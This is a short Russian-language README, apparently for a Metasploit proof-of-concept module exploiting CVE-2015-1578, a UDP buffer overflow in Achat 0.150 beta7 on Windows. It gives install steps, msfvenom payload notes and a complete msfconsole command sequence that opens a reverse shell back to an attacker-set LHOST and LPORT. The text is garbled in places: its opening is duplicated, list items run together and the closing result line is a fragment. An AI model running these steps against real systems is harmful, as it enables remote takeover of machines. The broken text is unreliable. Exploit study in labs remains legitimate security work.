Это proof-of-concept эксплойт модуля Metasploit для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удаленному выполнению кода через поддельный UDP-пакет.
Это модуль Metasploit для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удаленному выполнению кода с помощью специально подготовленного UDP-пакета.
Этот модуль предназначен для того, чтобы служить чистым, минимальным и хорошо структурированным примером разработки эксплойтов Metasploit. Он демонстрирует:
msfvenommsfvenom в вашем $PATHmsfvenom для генерации полезной нагрузки с кодировкой x86/unicode_mixed и пользовательскими запрещенными символами./install.sh
Затем запустите Metasploit и выполните:
reload_all
use exploit/windows/yaldobaoth/achat_bof
RHOSTS – IP-адрес цели (обязательно)LHOST – IP-адрес локального хоста для обратного шелла (обязательно)LPORT – Локальный порт для обратного шелла (по умолчанию: 4444)RPORT – Удаленный UDP-порт на цели (по умолчанию: 9256)msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Это приведет к:
LHOST:LPORT